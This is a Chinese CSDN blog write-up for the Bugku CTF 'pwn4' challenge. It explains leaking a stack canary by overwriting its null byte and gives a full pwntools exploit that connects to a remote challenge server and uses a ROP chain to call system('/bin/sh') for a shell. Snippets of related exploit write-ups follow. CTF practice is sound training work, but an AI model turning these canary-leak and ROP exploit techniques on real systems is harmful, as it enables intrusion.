[Bugku CTF——Pwn] pwn4

最新推荐文章于 2024-09-13 19:13:56 发布
最新推荐文章于 2024-09-13 19:13:56 发布
阅读量576 收藏
点赞数 2
分类专栏: # Bugku CTF 文章标签: ROPgadget Canary保护 system函数 shellcode Pwn挑战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/115084898
版权

[Bugku CTF——Pwn] pwn4

给的提示很清楚,绕过canary保护

那就绕过就好
在这里插入图片描述
题目当中有system函数
利用ROPgadget就好
在这里插入图片描述

思路

将canary低位的 ‘\x00’ 给覆盖掉, 就可以利用 %s 将其输出, leek出来

exploit

from pwn import *
#p = process('./pwn4_')
p = remote('114.67.246.176',15541)
pop_rdi = 0x0000000000400963
binsh = 0x0000000000601068
sys = 0x000000000040080C
payload = 'a' * (0x240 - 8)
p.sendlineafter('Please leave your name(Within 36 Length):', payload)
p.recvline()
canary = p.recv(7).rjust(8, '\x00')
#log.success('canary ---> : ' + canary)
print canary
payload1 = 'a' * (0x210 - 8) + canary + 'junkjunk' + p64(pop_rdi) + p64(binsh) + p64(sys)
p.sendafter('Please leave a message(Within 0x200 Length):' , payload1)
p.interactive()
Y-peak
关注
专栏目录
bugku pwn4(栈溢出)
weixin_44954083的博客
12-11 451
查看保护机制,没有任何保护 拉入ida看一下 read函数是一个危险函数,造成栈溢出 查看一下没有binsh字符串,但在ida里面看到哪个$0(这个在linux是shell脚本的名称) system()调用frok()产生子进程,由子进程来调用/bin/sh - c string来执行参数string字符串所代表的命令,系统调用 注一下: ps 是显示当前进程 ps a 显示目前所有程序,包...
BugkuCTF-PWNpwn7-repeater详细讲解多解法
am_03的博客
08-31 4267
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算出libc基址 3、计算出此libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
Bugku pwn4
、moddemod
05-26 263
找不到/bin/sh字符串,存在$0 这里因为64位程序与32位不同是通过寄存器传参的 思路,通过read函数溢出栈空间0x10大小,构造ROP链,调用system,通过rdi给system传参 exp from pwn import * p = remote('114.116.54.89' ,10004) rop = 0x4007d3 _system = 0x400570 bin_sh = 0x60111f p.recvuntil('Come on,try to pwn me') pa...
CTF-BugKu-PWN 瑞士军刀
最新发布
qq_51145360的博客
09-13 314
列出目前工作目录所含的文件及子目录。注意:nc连上之后是没有反馈的。用于显示文本文件内容,全部输出。可以看到有flag文件。
pwn4-bugku
weixin_45427676的博客
09-18 738
checksec 首先用checksec命令查看有没有什么保护机制 没有开任何保护机制,用IDA(64位)打开查看main函数。 函数分析 # memset函数 # setvbuf函数 # read函数 经过分析函数可以知道缓冲区中是&s,大小为0x10uLL,read函数是将大小为0x30uLL的数据存放到缓冲区&s中,其大小超过了缓冲区的大小,存在栈溢出。 s大小 ...
Bugku pwn4 WP
至臻求学,胸怀云月
02-18 736
下载地址 url checksec [*] '/mnt/hgfs/ubuntu_share/pwn/wiki/pwn4' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x4...
BugkuCTF-PWNpwn2-overflow超详细讲解
am_03的博客
08-30 2295
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
BugkuCTF-PWN题canary超详细讲解
am_03的博客
08-31 2395
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
BugkuCTF-PWNpwn3-read_note超详细讲解
am_03的博客
08-30 2706
知识点 puts()的特性 , puts()会一直输出某地址的数据,直到遇到 \x00 Canary最低位为\x00(截断符) \x 和 0x 的区别: 区别不大,都是把数按16进制输出。 1、0x 表示整型数值 (十六进制) char c = 0x42; 表示的是一个数值(字母B的ASCII码66),可以认为等价于: int c = 0x42; 2、\x42用于字符表达,或者字符串表达 char c = ‘\x42’; 亦等价于: char c = 0x42; char* s = “\x41\x42
BugkuCTF-PWNpwn6-printf超详细讲解(未提供Libc版本)
am_03的博客
08-31 1189
查看文件类型: 查看保护机制: IDA64位打开: 伪码: 查看子程序: case 2: case 3: case 1:
Pwn4 - Bugku
SkYe's Blog
10-22 403
Pwn4 - Bugku 程序基本情况 程序为64位,保护全关 代码审计 在main()函数中的read造成了栈溢出 IDAshift + F12检查有没有可疑字符串,同时检查有没有特殊函数如getshell() 在sub_400751()里面出现了调用system() 思路 main()函数存在栈溢出,可调用system()getshell,但是缺少一个参数/bin/sh。在字符串查找中...
bugku pwn4 学习
欢迎来到神林的博客
08-27 1263
2019-08-25 bugku pwn4 学习 1.拿到题目先file 一下文件看看文件属性 查看得知是64位动态链接库的文件。2.checksec 查看是否开启什么保护然而并没有什么保护PIE 保护指定是对代码段进行保护3.IDA查看内容 看到了敏感函数system,看着想办法跳转4.查看main函数,有栈溢出的敏感函数 read 想办法利用read 函数5.查看read函数栈中内容 完全能够...
[BUGKU] [PWN] PWN4
Stan冲冲冲
05-18 233
[BUGKU] [PWN] PWN4 先下载文件,拉入UBUNTU,checksec检查一下 checksec pwn4 发现啥都没开,最重要的是架构是amd64 在windows里把pwn4拉入64位ida 按F5切换到伪C 发现read可以溢出 read(0, &s, 0x30uLL); shift+f12查看字符串,发现没有/bin/sh,但是有$0 .data:0000000000601100 a4985y9yDyYfg8y db ‘4985y9y()DY)*YFG8yas08d9
ctfshow pwn 04
A2247328295的博客
04-13 551
接下来在第一个黄框位置下断点和printf函数处下断点,该断点为了查看canary的值,然后在printf()函数处下断点,该断点是为了查看canary在printf()函数处偏移,然后直接run。格式化字符串漏洞简单来说就是,由于printf函数不安全的使用造成的,%n是不安全的,还有printf(a)直接输出字符串也是不安全的,我们可以通过该漏洞获取canary泄露。黄框的地方是重点,第一个黄框为canary的插入,第二个为printf()函数的调用,第三个为canary的检验。
ctfshow pwn4
qq_39980610的博客
08-22 704
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。当程序停止在比对canary的时候我们可以看到栈上的0xc有了一个数据其实就是canary。我们可以分别将断点下在printf函数和程序比对canary的地址。
CTFShow pwn04
Mintind的博客
12-03 950
CTFShow pwn04 解题记录
BugkuCTF pwn pwn1
H4ppyD0g的博客
08-17 1303
1 pwn1 ubuntu下输入 nc 114.116.54.89 10001 然后ls查看该目录下文件,发现有flag文件, cat flag 获取flag。 nc 主机的ip或域名端口号 作用是建立于对应ip或端口的链接,相当于一个后门web shell,可以进行访问等操作。 nc的作用还有很多,这里只是最简单的应用。 ...
2021 BugKu CTF AWD排位赛真题解析
BugKu 2021 CTF AWD排位赛真题涵盖了信息安全领域中一项重要的技能竞技——Capture The Flag(CTF)的高级竞赛部分,即AWD(Attack With Defense,攻防对抗)模式。该模式特别强调攻防兼备的技能,要求参赛者在进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值